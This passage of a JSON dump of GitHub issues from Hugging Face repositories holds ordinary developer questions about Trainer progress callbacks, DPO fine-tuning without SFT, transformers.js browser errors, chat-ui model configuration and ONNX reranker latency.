], "created_at": "2024-02-09T08:18:42Z", "updated_at": "2024-03-13T15:02:51Z", "user": "Eggwardhan" }, { "repo": "huggingface/transformers", "number": 28924, "title": "How to disable log history from getting printed every logging_steps", "body": "I'm writing a custom ProgressCallback that modifies the original ProgressCallback transformers implementation and adds some additional information/data to the tqdm progress bar. Here's what I have so far, and it works nicely and as intended.\r\n\r\n```python\r\nclass ProgressCallback(TrainerCallback):\r\n \"\"\"A [`TrainerCallback`] that displays the progress of training or evaluation.\r\n\r\n Specifically, it shows:\r\n 1. Time spent so far in training or evaluation.\r\n 2. Estimated time remaining for training or evaluation.\r\n 3. Iterations per second.\r\n 4. Loss.\r\n 5. 
Number of input tokens seen so far.\r\n \"\"\"\r\n\r\n def __init__(self):\r\n self.training_bar = None\r\n self.prediction_bar = None\r\n self.current_step: int = 0\r\n self.loss: float = math.nan\r\n self.num_input_tokens_seen = format_number_suffix(0)\r\n\r\n def on_train_begin(self, args, state, control, **kwargs):\r\n if state.is_world_process_zero:\r\n self.training_bar = tqdm(total=state.max_steps, dynamic_ncols=True)\r\n\r\n def on_step_end(self, args, state, control, **kwargs):\r\n if state.is_world_process_zero:\r\n self.training_bar.update(state.global_step - self.current_step)\r\n self.current_step = state.global_step\r\n\r\n def on_prediction_step(self, args, state, control, eval_dataloader=None, **kwargs):\r\n if state.is_world_process_zero and has_length(eval_dataloader):\r\n if self.prediction_bar is None:\r\n self.prediction_bar = tqdm(\r\n total=len(eval_dataloader),\r\n leave=self.training_bar is None,\r\n dynamic_ncols=True,\r\n )\r\n self.prediction_bar.update(1)\r\n\r\n def on_evaluate(self, args, state, control, **kwargs):\r\n if state.is_world_process_zero:\r\n if self.prediction_bar is not None:\r\n self.prediction_bar.close()\r\n self.prediction_bar = None\r\n\r\n def on_predict(self, args, state, control, **kwargs):\r\n if state.is_world_process_zero:\r\n if self.prediction_bar is not None:\r\n self.prediction_bar.close()\r\n self.prediction_bar = None\r\n\r\n def on_log(self, args, state, control, logs=None, **kwargs):\r\n if state.is_world_process_zero and self.training_bar is not None:\r\n # The last callback_handler.on_log() call in the training loop logs `train_loss` as opposed to `loss`.\r\n # From some digging through transformers code, the `train_loss` is the average training loss\r\n # during training.\r\n # See: https://github.com/huggingface/transformers/blob/v4.27.2/src/transformers/trainer.py#L2025-L2026\r\n self.loss = (\r\n state.log_history[-1][\"loss\"]\r\n if state.log_history and \"loss\" in state.log_history[-1]\r\n else state.log_history[-1][\"train_loss\"]\r\n )\r\n self.num_input_tokens_seen = format_number_suffix(state.num_input_tokens_seen)\r\n self.training_bar.set_postfix_str(\r\n f\"loss: {self.loss:.4f}, tokens: {self.num_input_tokens_seen}\",\r\n )\r\n\r\n def on_train_end(self, args, state, control, **kwargs):\r\n if state.is_world_process_zero:\r\n self.training_bar.close()\r\n self.training_bar = None\r\n```\r\n\r\nIn my trainer arguments, I explicitly `disable_tdqm` so I can pass this as a custom callback in place of the original ProgressCallback. I also set `logging_steps` to 1 so that I can get metrics back from every step through the `log_history` attribute in the TrainerState object. \r\n\r\nThe challenge I'm having is that it logs the metric to stdout, but I am not sure where that actually comes from in the code. I don't want that behavior since I want to surface relevant information directly in my TQDM progress back through my callback. Looking at the transformers trainer, I've narrowed down that metrics get pass to `on_log` in the callback, and that seems to happen from within this function at the end of each step of training and then again at the end of training: https://github.com/huggingface/transformers/blob/v4.27.2/src/transformers/trainer.py#L2224 \r\n\r\nWhen I set a breakpoint at the end of `on_log` in my callback, I can confirm that the logs object doesn't get printed to stdout. 
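(Editor's note: a likely culprit, worth verifying against your transformers version: when `disable_tqdm=True`, `Trainer` registers `PrinterCallback` in place of `ProgressCallback`, and its `on_log` prints the logs dict straight to stdout. If so, the fix is one line; `model`, `train_ds`, and the custom `ProgressCallback` below refer to this issue's own setup.)

```python
from transformers import PrinterCallback, Trainer, TrainingArguments

args = TrainingArguments(output_dir="out", disable_tqdm=True, logging_steps=1)
trainer = Trainer(model=model, args=args, train_dataset=train_ds,
                  callbacks=[ProgressCallback()])

# Trainer auto-registers PrinterCallback whenever disable_tqdm=True; its
# on_log() is what print()s the metrics dict each logging step.
trainer.remove_callback(PrinterCallback)
```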
So it happens somewhere between that and this looping to get to the next train step, but not sure if I am missing something obvious since I'm still new to the transformers codebase.\r\n\r\nHere's what I see in my output:\r\n```\r\n***** Running training *****\r\n Num examples = 183\r\n Num Epochs = 3\r\n Instantaneous batch size per device = 1\r\n Total train batch size (w. parallel, distributed & accumulation) = 16\r\n Gradient Accumulation steps = 16\r\n Total optimization steps = 33\r\n Number of trainable parameters = 256\r\n 3%|\u2588\u2588\u258d | 1/33 [00:01<00:34, 1.07s/it, loss", "url": "https://github.com/huggingface/transformers/issues/28924", "state": "closed", "labels": [], "created_at": "2024-02-08T10:23:28Z", "updated_at": "2024-02-08T17:26:02Z", "user": "arnavgarg1" }, { "repo": "huggingface/alignment-handbook", "number": 120, "title": "(QLoRA) DPO without previous SFT", "body": "Because of the following LLM-Leaderboard measurements, I want to perform QLoRA DPO without previous QLoRA SFT:\r\n```\r\nalignment-handbook/zephyr-7b-dpo-qlora: +Average: 63.51; +ARC 63.65; +HSwag 85.35; -+MMLU 63.82; ++TQA: 47.14; (+)Win 79.01; +GSM8K 42.08; \r\n\r\nalignment-handbook/zephyr-7b-sft-qlora: -Average: 59; (+)ARC 60.07; (-)HSwag 82.36; -MMLU 61.65; -TQA: 38.88; -Win 76.8; -GSM8K 34.27; \r\n\r\nmistralai/Mistral-7B-v0.1: Average: 60.97; ARC 59.98; HSwag 83.31; MMLU 64.16; TQA: 42.15; Win 78.37; GSM8K 37.83; \r\n```\r\nAs you can see, there is catastrophic forgetting in `zephyr-7b-sft-qlora` in almost all tasks, especially in MMLU, TruthfulQA, and GSM8K. Thus I wonder why do SFT at all?\r\n\r\nIn more detail\r\n============\r\n\r\nQ1: Why is there so much catastrophic forgetting in `zephyr-7b-sft-qlora` ? Due to the following improvements by DPO, the dataset seems to be apt. \r\n\r\nQ2: Why is SFT performed before DPO at all? Is it some prerequisite, like SFT training the model to follow instructions at all, before DPO aligning the responses to instructions with human preferences? \r\n\r\nQ3: I tried the following for DPO without previous SFT:\r\nModify `recipes/zephyr-7b-beta/dpo/config_qlora.yaml` by using `model_name_or_path: mistralai/Mistral-7B-v0.1` and then calling `scripts/run_dpo.py` on it:\r\n```\r\necho -e \"2,3c2\\n< model_name_or_path: mistralai/Mistral-7B-v0.1\\n< model_revision: main\\n---\\n> model_name_or_path: alignment-handbook/zephyr-7b-sft-qlora\\n36c35\\n< gradient_accumulation_steps: 8\\n---\\n> gradient_accumulation_steps: 2\\n40c39\\n< hub_model_id: zephyr-7b-dpo-qlora-no-sft\\n---\\n> hub_model_id: zephyr-7b-dpo-qlora\\n49,51c48,50\\n< output_dir: data/zephyr-7b-dpo-qlora-no-sft # It is handy to append `hub_model_revision` to keep track of your local experiments\\n< per_device_train_batch_size: 1\\n< per_device_eval_batch_size: 2\\n---\\n> output_dir: data/zephyr-7b-dpo-qlora # It is handy to append `hub_model_revision` to keep track of your local experiments\\n> per_device_train_batch_size: 4\\n> per_device_eval_batch_size: 8\\n53,55d51\\n< report_to:\\n< - tensorboard\\n< - wandb\" | patch recipes/zephyr-7b-beta/dpo/config_qlora.yaml\r\nACCELERATE_LOG_LEVEL=info accelerate launch --config_file recipes/accelerate_configs/multi_gpu.yaml --num_processes=1 scripts/run_dpo.py recipes/zephyr-7b-beta/dpo/config_qlora.yaml\r\n```\r\nHowever, I get the error described at https://github.com/huggingface/alignment-handbook/issues/93. 
The solution there inspired me to do the following (so I don't have to go into the cache to replace tokenizer configs): Add in line 77 of `src/alignment/data.py`\r\n```\r\ntokenizer.chat_template = \"{% for message in messages %}\\n{% if message['role'] == 'user' %}\\n{{ '<|user|>\\n' + message['conten\\\r\nt'] + eos_token }}\\n{% elif message['role'] == 'system' %}\\n{{ '<|system|>\\n' + message['content'] + eos_token }}\\n{% elif message['role'] \\\r\n== 'assistant' %}\\n{{ '<|assistant|>\\n' + message['content'] + eos_token }}\\n{% endif %}\\n{% if loop.last and add_generation_prompt %}\\n{{\\\r\n '<|assistant|>' }}\\n{% endif %}\\n{% endfor %}\"\r\n ```\r\nBut Mistral's `default_chat_template` already allows system messages, so the problem seems to be that the dialogs in the dataset really do not alternate between user and assistant messages. Right? What is the reason for this?\r\n\r\nMistrals `default_chat_template` causing the error message:\r\n``` \r\n{% if messages[0]['role'] == 'system' %}{% set loop_messages = messages[1:] %}{% set system_message = messages[0]['content'] %}{% elif false == true and not '<>' in messages[0]['content'] %}{% set loop_messages = messages %}{% set system_message = 'You are a helpful, respectful and honest assistant. Always answer as helpfully as possible, while being safe. Your answers should not include any harmful, unethical, \r\nracist, sexist, toxic, dangerous, or illegal content. Please ensure that your responses are socially unbiased and positive in nature.\\n\\nIf a question does not make any sense, or is not factually coherent, explain why instead of answering something not correct. If you don\\'t know\r\n the answer to a question, please don\\'t share false information.' %}{% else %}{% set loop_messages = messages %}{% set system_message = false %}{% endif %}{% for message in loop_messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if loop.index0 == 0 and system_message != false %}{% set conte\r\nnt = '<>\\n' + system_message + '\\n<>\\n\\n' + message['content'] %}{% else %}{% set content = message['content'] %}{% endif %}{% if message['role'] == 'user' %}{{ bos_token + '[INST] ' + content.strip() + ' [/INST]' }}{% elif message['role'] == 'system' %}{{ '<>\\n' + content.strip() + '\\n<>\\n\\n' }}{% elif message['role'] == 'assistant' %}{{ ' ' + content.strip() + ' ' + eos_token }}{% endif %}{%", "url": "https://github.com/huggingface/alignment-handbook/issues/120", "state": "open", "labels": [], "created_at": "2024-02-08T09:56:50Z", "updated_at": "2024-02-09T22:15:10Z", "comments": 1, "user": "DavidFarago" }, { "repo": "huggingface/transformers.js", "number": 577, "title": "Getting 'fs is not defined' when trying the latest \"background removal\" functionality in the browser?", "body": "### Question\r\n\r\nI copied the code from https://github.com/xenova/transformers.js/blob/main/examples/remove-background-client/main.js to here, but I'm getting this error with v2.15.0 of @xenova/transformers.js:\r\n\r\n```\r\nUncaught ReferenceError: fs is not defined\r\n at env.js:36:31\r\n at [project]/node_modules/.pnpm/@xenova+transformers@2.15.0/node_modules/@xenova/transformers/src/env.js [app-client] (ecmascript) (http://localhost:3001/_next/static/chunks/8484b_%40xenova_transformers_src_5fe153._.js:258:3)\r\n at runtime-base.ts:322:21\r\n at runModuleExecutionHooks (runtime-base.ts:376:5)\r\n at instantiateModule 
(runtime-base.ts:321:5)\r\n at getOrInstantiateModuleFromParent (runtime-base.ts:424:10)\r\n at esmImport (runtime-utils.ts:205:18)\r\n at hub.js:6:2\r\n at [project]/node_modules/.pnpm/@xenova+transformers@2.15.0/node_modules/@xenova/transformers/src/utils/hub.js [app-client] (ecmascript) (http://localhost:3001/_next/static/chunks/8484b_%40xenova_transformers_src_5fe153._.js:783:3)\r\n at runtime-base.ts:322:21\r\n at runModuleExecutionHooks (runtime-base.ts:376:5)\r\n at instantiateModule (runtime-base.ts:321:5)\r\n at getOrInstantiateModuleFromParent (runtime-base.ts:424:10)\r\n at esmImport (runtime-utils.ts:205:18)\r\n at tokenizers.js:21:2\r\n at [project]/node_modules/.pnpm/@xenova+transformers@2.15.0/node_modules/@xenova/transformers/src/tokenizers.js [app-client] (ecmascript) (http://localhost:3001/_next/static/chunks/8484b_%40xenova_transformers_src_5fe153._.js:6729:3)\r\n at runtime-base.ts:322:21\r\n at runModuleExecutionHooks (runtime-base.ts:376:5)\r\n at instantiateModule (runtime-base.ts:321:5)\r\n at getOrInstantiateModuleFromParent (runtime-base.ts:424:10)\r\n at esmImport (runtime-utils.ts:205:18)\r\n at pipelines.js:14:2\r\n at [project]/node_modules/.pnpm/@xenova+transformers@2.15.0/node_modules/@xenova/transformers/src/pipelines.js [app-client] (ecmascript) (http://localhost:3001/_next/static/chunks/8484b_%40xenova_transformers_src_5fe153._.js:17183:3)\r\n at runtime-base.ts:322:21\r\n at runModuleExecutionHooks (runtime-base.ts:376:5)\r\n at instantiateModule (runtime-base.ts:321:5)\r\n at getOrInstantiateModuleFromParent (runtime-base.ts:424:10)\r\n at esmImport (runtime-utils.ts:205:18)\r\n at 8484b_@xenova_transformers_src_5fe153._.js:17215:237\r\n at [project]/node_modules/.pnpm/@xenova+transformers@2.15.0/node_modules/@xenova/transformers/src/transformers.js [app-client] (ecmascript) {module evaluation} (http://localhost:3001/_next/static/chunks/8484b_%40xenova_transformers_src_5fe153._.js:17228:3)\r\n at runtime-base.ts:322:21\r\n at runModuleExecutionHooks (runtime-base.ts:376:5)\r\n at instantiateModule (runtime-base.ts:321:5)\r\n at getOrInstantiateModuleFromParent (runtime-base.ts:424:10)\r\n at esmImport (runtime-utils.ts:205:18)\r\n at _b29e97._.js:19146:268\r\n at [project]/app/remove/background/page.tsx [app-client] (ecmascript) (http://localhost:3001/_next/static/chunks/_b29e97._.js:19389:3)\r\n at runtime-base.ts:322:21\r\n at runModuleExecutionHooks (runtime-base.ts:376:5)\r\n at instantiateModule (runtime-base.ts:321:5)\r\n at getOrInstantiateModuleFromParent (runtime-base.ts:424:10)\r\n at commonJsRequire (runtime-utils.ts:230:18)\r\n at requireModule (react-server-dom-turbopack-client.browser.development.js:154:23)\r\n at initializeModuleChunk (react-server-dom-turbopack-client.browser.development.js:1336:17)\r\n at readChunk (react-server-dom-turbopack-client.browser.development.js:1146:7)\r\n at mountLazyComponent (react-dom.development.js:16652:19)\r\n at beginWork$1 (react-dom.development.js:18388:16)\r\n at beginWork (react-dom.development.js:26791:14)\r\n at performUnitOfWork (react-dom.development.js:25637:12)\r\n at workLoopSync (react-dom.development.js:25353:5)\r\n```\r\n\r\nAny idea what is wrong and how to fix it? 
Here is my code, which basically a direct React.js port of the background removal example you all shared:\r\n\r\n```tsx\r\n'use client'\r\n\r\nimport {\r\n AutoModel,\r\n AutoProcessor,\r\n env,\r\n PreTrainedModel,\r\n Processor,\r\n RawImage,\r\n} from '@xenova/transformers'\r\nimport React, {\r\n MouseEvent,\r\n useCallback,\r\n useEffect,\r\n useRef,\r\n useState,\r\n} from 'react'\r\nimport _ from 'lodash'\r\nimport FileDropzone from '~/components/FileDropzone'\r\n\r\n// Since we will download the model from the Hugging Face Hub, we can skip the local model check\r\nenv.allowLocalModels = false\r\n\r\n// Proxy the WASM backend to prevent the UI from freezing\r\nenv.backends.onnx.wasm.proxy = true\r\n\r\nfunction useModel(): {\r\n model?: PreTrainedModel\r\n processor?: Processor\r\n} {\r\n const [model, setModel] = useState()\r\n const [processor, setProcessor] = useState()\r\n\r\n useEffect(() => {\r\n AutoModel.from_pretrained('briaai/RMBG-1.4', {\r\n config: { model_type: 'custom' },\r\n }).then(m => {\r\n setModel(m)\r\n })\r\n\r\n AutoProcessor.from_pretrained('briaai/RMBG-1.4', {\r\n config: {\r\n ", "url": "https://github.com/huggingface/transformers.js/issues/577", "state": "open", "labels": [ "question" ], "created_at": "2024-02-08T04:34:59Z", "updated_at": "2024-11-26T05:20:22Z", "user": "lancejpollard" }, { "repo": "huggingface/transformers.js", "number": 575, "title": "Can GPU acceleration be used when using this library in a node.js environment?", "body": "### Question\n\nHello, I have looked into the GPU support related issue, but all mentioned content is related to webGPU. May I ask if GPU acceleration in the node.js environment is already supported? Refer: https://github.com/microsoft/onnxruntime/tree/main/js/node", "url": "https://github.com/huggingface/transformers.js/issues/575", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-07T03:37:50Z", "updated_at": "2025-01-20T15:05:00Z", "user": "SchneeHertz" }, { "repo": "huggingface/dataset-viewer", "number": 2408, "title": "Add task tags in /hub-cache?", "body": "On the same model as https://github.com/huggingface/datasets-server/pull/2386, detect and associate tags to a dataset to describe the tasks it can be used for.\r\n\r\nPreviously discussed at https://github.com/huggingface/datasets-server/issues/561#issuecomment-1250029425", "url": "https://github.com/huggingface/dataset-viewer/issues/2408", "state": "closed", "labels": [ "question", "feature request", "P2" ], "created_at": "2024-02-06T11:17:19Z", "updated_at": "2024-06-19T15:43:15Z", "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 2407, "title": "Remove env var HF_ENDPOINT?", "body": "Is it still required to set HF_ENDPOINT as an environment variable?\r\n\r\nhttps://github.com/huggingface/datasets-server/blob/main/services/worker/src/worker/resources.py#L41-L45\r\n\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2407", "state": "closed", "labels": [ "duplicate", "question", "refactoring / architecture", "P2" ], "created_at": "2024-02-06T11:11:24Z", "updated_at": "2024-02-06T14:53:12Z", "user": "severo" }, { "repo": "huggingface/chat-ui", "number": 786, "title": "Can't get Mixtral to work with web-search", "body": "I have been following this project for a while and recently tried setting up oobabooga Mixtral-8x7b\r\n\r\nI used the official prompt template used in huggingface.co :\r\n\r\n```\r\n {{#each messages}}{{#ifUser}}[INST]{{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}} 
{{content}} [/INST]{{/ifUser}}{{#ifAssistant}} {{content}} {{/ifAssistant}}{{/each}}\r\n``` \r\n\r\nNormal chat works, and summarization for the title works, but web-search does not.\r\nIt always gives the full answer instead of a search term.\r\n\r\n![image](https://github.com/huggingface/chat-ui/assets/20077386/19f307ec-96a0-4e33-9f03-90755242da6c)\r\n\r\n\r\nHere is my local.env:\r\n\r\n\r\n```\r\nMONGODB_URL=mongodb://localhost:27017\r\nUSE_LOCAL_WEBSEARCH=true\r\nPUBLIC_APP_ASSETS=chatui\r\nHF_ACCESS_TOKEN=hf_none\r\nPUBLIC_APP_DESCRIPTION=\"ChatGPT But Open Source!\"\r\nPUBLIC_APP_NAME=ChatGPT\r\nMODELS=`[\r\n {\r\n \"name\": \"LocalGPT\",\r\n \"description\": \"Mixtral is a great overall model\",\r\n \"chatPromptTemplate\" : \" {{#each messages}}{{#ifUser}}[INST]{{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}} {{content}} [/INST]{{/ifUser}}{{#ifAssistant}} {{content}} {{/ifAssistant}}{{/each}}\",\r\n \"preprompt\": \"\",\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python and give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"parameters\": {\r\n \"temperature\": 0.3,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 2048,\r\n \"stop\": [\"\"]\r\n },\r\n \"endpoints\": [{\r\n \"type\" : \"openai\",\r\n \"baseURL\": \"http://127.0.0.1:5000/v1\"\r\n }]\r\n }\r\n]`\r\n\r\n``` \r\n", "url": "https://github.com/huggingface/chat-ui/issues/786", "state": "open", "labels": [], "created_at": "2024-02-06T07:14:08Z", "updated_at": "2024-02-16T10:45:40Z", "comments": 2, "user": "iChristGit" }, { "repo": "huggingface/dataset-viewer", "number": 2402, "title": "Reduce resources for /filter and /search?", "body": "They have nearly 0 traffic. https://grafana.huggingface.tech/d/i7gwsO5Vz/global-view?orgId=1&from=now-6h&to=now\r\n\r\nShould we reduce the number of pods? How to configure the right level?", "url": "https://github.com/huggingface/dataset-viewer/issues/2402", "state": "closed", "labels": [ "question", "infra", "P2", "prod" ], "created_at": "2024-02-05T21:44:56Z", "updated_at": "2024-02-28T17:55:50Z", "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 2390, "title": "Store the repo visibility (public/private) to filter webhooks", "body": "See https://github.com/huggingface/datasets-server/pull/2389#pullrequestreview-1862425050\r\n\r\nNot sure if we want to do it, or wait for the Hub to provide more finely scoped webhooks. See also #2208, where we wanted to store metadata about the datasets.", "url": "https://github.com/huggingface/dataset-viewer/issues/2390", "state": "closed", "labels": [ "question", "P2" ], "created_at": "2024-02-05T12:37:30Z", "updated_at": "2024-06-19T15:37:36Z", "user": "severo" }, { "repo": "huggingface/transformers.js", "number": 567, "title": "Does await pipeline() support multithreading? I've tried all kinds of multithreaded calls and it still returns the results one by one in order.", "body": "### Question\n\nDoes await pipeline() support multithreading? 
I've tried all kinds of multithreaded calls and it still returns the results one by one in order.", "url": "https://github.com/huggingface/transformers.js/issues/567", "state": "open", "labels": [ "question" ], "created_at": "2024-02-05T11:12:34Z", "updated_at": "2024-02-05T11:12:34Z", "user": "a414166402" }, { "repo": "huggingface/transformers.js", "number": 565, "title": "How can i use this Model for image matting?", "body": "### Question\n\nhttps://github.com/ZHKKKe/MODNet?tab=readme-ov-file\r\n\r\nThey have ONNX file and the python cli usage looks simple, but I can't find how to use with transformers.js.\r\n```\r\n!python -m demo.image_matting.colab.inference \\\r\n --input-path demo/image_matting/colab/input \\\r\n --output-path demo/image_matting/colab/output \\\r\n --ckpt-path ./pretrained/modnet_photographic_portrait_matting.ckpt\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/565", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-05T09:28:28Z", "updated_at": "2024-02-07T11:33:26Z", "user": "cyio" }, { "repo": "huggingface/transformers.js", "number": 564, "title": "Can models from user disks load and run in my HF space?", "body": "### Question\r\n\r\nIm fiddling around with the react-translator template.\r\nWhat I have accomplished so far:\r\n- Run local (on disk in public folder) model in localhost webapp.\r\n- Run hosted (on HF) model in localhost webapp.\r\n- Run hosted (on HF) model in HF Space webapp.\r\n\r\nWhat i want to accomplish but can't figure out:\r\n- Use local (on disk in any folder) model in HF Space webapp.\r\n\r\nIs this possible? \r\n\r\nFrom what i understand so far, local models have to be in the public folder of the webapp, but that defeats the purpose of my webapp, which would be to allow users to benchmark models from any folder of their disk in my HF Space. \r\n\r\nPreferably the user would provide a path or use drag'n'drop to provide their model folder location on the disk and the webapp would then proceed to load the model from the provided location into the application cache. \r\n\r\nThe reason i need this specific setup is because i work on a benchmarking tool and I don't want to force users to host their models on HF in order to be able to benchmark them.", "url": "https://github.com/huggingface/transformers.js/issues/564", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-05T08:00:55Z", "updated_at": "2024-06-07T01:17:24Z", "user": "saferugdev" }, { "repo": "huggingface/transformers", "number": 28860, "title": "Question: How do LLMs learn to be \"Generative\", as we often describe them?", "body": "(Please forgive me and let me know if I'm not allowed to ask this kind of question here. I'm so sorry if I'm bothering everyone.)\r\n\r\nAFAIK to be called \"generative\", a model should have the ability to learn the joint probability over the training data. In the case of LLMs, we apply the chain rule of Bayes' formula to achieve this by leveraging the autoregressive method for every token of each input text sequence. For example, with a text sequence of 4 tokens, it can be written as:\r\n```\r\np(x4,x3,x2,x1) = p(x4|x3,x2,x1) * p(x3|x2,x1) * p(x2|x1) * p(x1)\r\n```\r\nwhere `x1` denotes the 1st token, `x2` denotes the 2nd token and so on, respectively.\r\n\r\nI understand the conditional terms `p(x_n|...)` where we use cross-entropy to calculate their losses. However, I'm unsure about the probability of the very first token `p(x1)`. How is it calculated? 
Is it in some configurations of the training process, or in the model architecture, or in the loss function?\r\n\r\nIMHO, if the model doesn't learn `p(x1)` properly, the entire formula for Bayes' rule cannot be completed, and we can't refer to LLMs as \"truly generative\". Am I missing something here?\r\n\r\nI asked the [same question on `nanoGPT` repo](https://github.com/karpathy/nanoGPT/issues/432) and [on HN](https://news.ycombinator.com/item?id=39249301). I'm also reading Transformer codes from this repo, but I haven't found the answer I'm looking for yet. Could someone please enlighten me? Thank in advance!", "url": "https://github.com/huggingface/transformers/issues/28860", "state": "closed", "labels": [], "created_at": "2024-02-05T07:10:23Z", "updated_at": "2024-02-05T12:22:27Z", "user": "metalwhale" }, { "repo": "huggingface/sentence-transformers", "number": 2470, "title": "BGE Reranker / BERT Crossencoder Onnx model latency issue", "body": "I am using the Int8 quantized version of BGE-reranker-base model converted to the Onnx model. I am processing the inputs in batches. Now the scenario is that I am experiencing a latency of 20-30 secs with the original model. With the int8 quantized and onnx optimized model, the latency was reduced to 8-15 secs keeping all the configurations the same like hardware, batch processing, and everything I used with the original torch model. \r\nI am using Flask as an API server, on a quad-core machine.\r\nI want further to reduce the model latency of the Onnx model. How can I do so?\r\nAlso please suggest anything more I can do during the deployment ", "url": "https://github.com/huggingface/sentence-transformers/issues/2470", "state": "open", "labels": [ "question" ], "created_at": "2024-02-05T05:54:18Z", "updated_at": "2024-02-09T06:59:51Z", "user": "ojasDM" }, { "repo": "huggingface/chat-ui", "number": 774, "title": "Where are the image and pdf upload features when running on locally using this repo?", "body": "I see there are issues and features being talked about and added for the image upload and parsing PDFs as markdown etc. However, I dont see these features in when I cloned this repo and started chatui using \"npm run dev\" locally. \r\nAm I missing something? \r\n\r\n#641 are the features I am talking about. ", "url": "https://github.com/huggingface/chat-ui/issues/774", "state": "closed", "labels": [], "created_at": "2024-02-05T00:41:05Z", "updated_at": "2024-02-05T08:48:29Z", "comments": 1, "user": "zubu007" }, { "repo": "huggingface/chat-ui", "number": 771, "title": "using openai api key for coporate", "body": "Hi\r\nWe are working with an open ai key for our corporate ( it has a corporate endpoint) \r\nthis is how we added the model to .env.local\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"Corporate local instance of GPT 3.5 Model\",\r\n \"endpoints\": [{\r\n \"type\": \"openai\",\r\n \"url\": \"corporate url\"\r\n }],\r\n \"userMessageToken\": \"User: \",\r\n \"assistantMessageToken\": \"Assistant: \",\r\n \"messageEndToken\": \"\",\r\n \"preprompt\": \" \",\r\n \"prepromptUrl\": \"http://127.0.0.1:8000/preprompt.txt\",\r\n \"parameters\": {\r\n \"temperature\": 0.9,\r\n \"max_new_tokens\": 1024,\r\n \"truncate\": 31000\r\n },\r\n```\r\nThe problem I can't connet t to the model there are authentications issues. 
this is what we get:\r\n\r\n\r\nanyone else tried to connect with corporate openai api key?\r\nHow can we solve this?\r\nwe can connect to the model using python so this is not an issue with the credentials.", "url": "https://github.com/huggingface/chat-ui/issues/771", "state": "open", "labels": [ "models" ], "created_at": "2024-02-04T11:23:59Z", "updated_at": "2024-02-06T15:01:50Z", "comments": 1, "user": "RachelShalom" }, { "repo": "huggingface/optimum-neuron", "number": 460, "title": "[QUESTION] What is the difference between optimum-neuron and transformers-neuronx?", "body": "I would like to understand the differences between this optimum-neuron and [transformers-neuronx](https://github.com/aws-neuron/transformers-neuronx).", "url": "https://github.com/huggingface/optimum-neuron/issues/460", "state": "closed", "labels": [], "created_at": "2024-02-02T18:27:46Z", "updated_at": "2024-03-27T11:04:52Z", "user": "leoribeiro" }, { "repo": "huggingface/dataset-viewer", "number": 2376, "title": "Should we increment \"failed_runs\" when error is \"ResponseAlreadyComputedError\"?", "body": "Related to https://github.com/huggingface/datasets-server/issues/1464: is it really an error?", "url": "https://github.com/huggingface/dataset-viewer/issues/2376", "state": "closed", "labels": [ "question", "P2" ], "created_at": "2024-02-02T12:08:31Z", "updated_at": "2024-02-22T21:16:12Z", "user": "severo" }, { "repo": "huggingface/autotrain-advanced", "number": 484, "title": "How to ask question AutoTrained LLM , If I ask question dosn't return any answer", "body": "Hi,\r\nLLM training was successful , But I asked any question from my trained context and it was not answered.How to ask proper question?\r\n\r\nrom transformers import AutoModelForCausalLM, AutoTokenizer\r\n\r\nmodel_path = \"bert-base-uncased_finetuning\"\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(model_path)\r\nmodel = AutoModelForCausalLM.from_pretrained(\r\n model_path,\r\n device_map=\"cuda\",\r\n torch_dtype='auto'\r\n).eval()\r\n\r\n# Prompt content: \"hi\"\r\nmessages = [\r\n {\"role\": \"user\", \"content\": \"hi\"}\r\n]\r\n\r\ninput_ids = tokenizer.apply_chat_template(conversation=messages, tokenize=True, add_generation_prompt=True, return_tensors='pt')\r\noutput_ids = model.generate(input_ids.to('cuda'))\r\nresponse = tokenizer.decode(output_ids[0][input_ids.shape[1]:], skip_special_tokens=True)\r\n\r\n# Model response: \"Hello! How can I assist you today?\"\r\nprint(response)\r\n\r\nSome weights of BertLMHeadModel were not initialized from the model checkpoint at bert-base-uncased and are newly initialized: ['cls.predictions.decoder.bias']\r\nYou should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.\r\nexample\r\n/usr/local/lib/python3.10/dist-packages/transformers/generation/utils.py:1128: UserWarning: Using the model-agnostic default `max_length` (=20) to control the generation length. We recommend setting `max_new_tokens` to control the maximum length of the generation.\r\n warnings.warn(\r\n/usr/local/lib/python3.10/dist-packages/transformers/generation/utils.py:1136: UserWarning: Input length of input_ids is 24, but `max_length` is set to 20. This can lead to unexpected behavior. 
You should consider increasing `max_new_tokens`.\r\n warnings.warn(\r\n", "url": "https://github.com/huggingface/autotrain-advanced/issues/484", "state": "closed", "labels": [ "stale" ], "created_at": "2024-02-02T09:29:07Z", "updated_at": "2024-03-04T15:01:36Z", "user": "charles-123456" }, { "repo": "huggingface/chat-ui", "number": 761, "title": "Does chat-ui support offline deployment? I have downloaded the weights to my local computer.", "body": " I have downloaded the weights to my local computer. Due to network issues, I am unable to interact with the huggingface website. Can I do offline deployment based on chat-ui and downloaded weights from huggingface? Do I not need to set HF_TOKEN=?Does that mean I don't need to set HF_TOKEN= in the .env.local file?", "url": "https://github.com/huggingface/chat-ui/issues/761", "state": "closed", "labels": [ "support" ], "created_at": "2024-02-02T07:57:19Z", "updated_at": "2024-02-04T03:23:25Z", "comments": 2, "user": "majestichou" }, { "repo": "huggingface/transformers.js", "number": 557, "title": "how to cast types?", "body": "### 